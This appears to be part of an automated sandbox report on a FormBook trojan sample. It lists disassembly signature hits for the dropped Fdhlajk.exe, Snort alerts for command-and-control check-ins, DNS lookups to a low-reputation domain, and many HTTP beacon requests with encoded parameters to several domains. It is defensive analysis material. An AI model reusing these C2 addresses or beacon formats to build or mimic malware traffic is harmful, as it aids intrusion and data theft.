Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebx]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov edx, dword ptr [eax]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov ebx, dword ptr [ecx]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor ecx, ecx
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 00000080h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 02h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 01h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then lea edx, dword ptr [ebp-08h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 15000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe | DNS query: www.f9fui8.xyz
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mobiessence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.trendyheld.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.beastninjas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.importexportasia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.kilbyrnefarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.dragonshipping.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mylifeinpark.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.delhibudokankarate.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.vavasoo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.schoolfrontoffice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mypursuitpodcast.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.besport24.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mobiessence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.trendyheld.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.beastninjas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.importexportasia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.kilbyrnefarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.dragonshipping.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mylifeinpark.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.delhibudokankarate.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mobiessence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.trendyheld.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.beastninjas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.importexportasia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.kilbyrnefarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.dragonshipping.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mylifeinpark.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.delhibudokankarate.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.vavasoo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.schoolfrontoffice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mypursuitpodcast.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.besport24.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mobiessence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.trendyheld.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.beastninjas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.importexportasia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.kilbyrnefarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.dragonshipping.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.mylifeinpark.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1 | Host: www.delhibudokankarate.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: unknown | DNS traffic detected: queries for: onedrive.live.com
          Source: Form_TT_EUR57,890.exe, 00000001.00000003.341319212.00000000007A2000.00000004.00000001.sdmp, Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
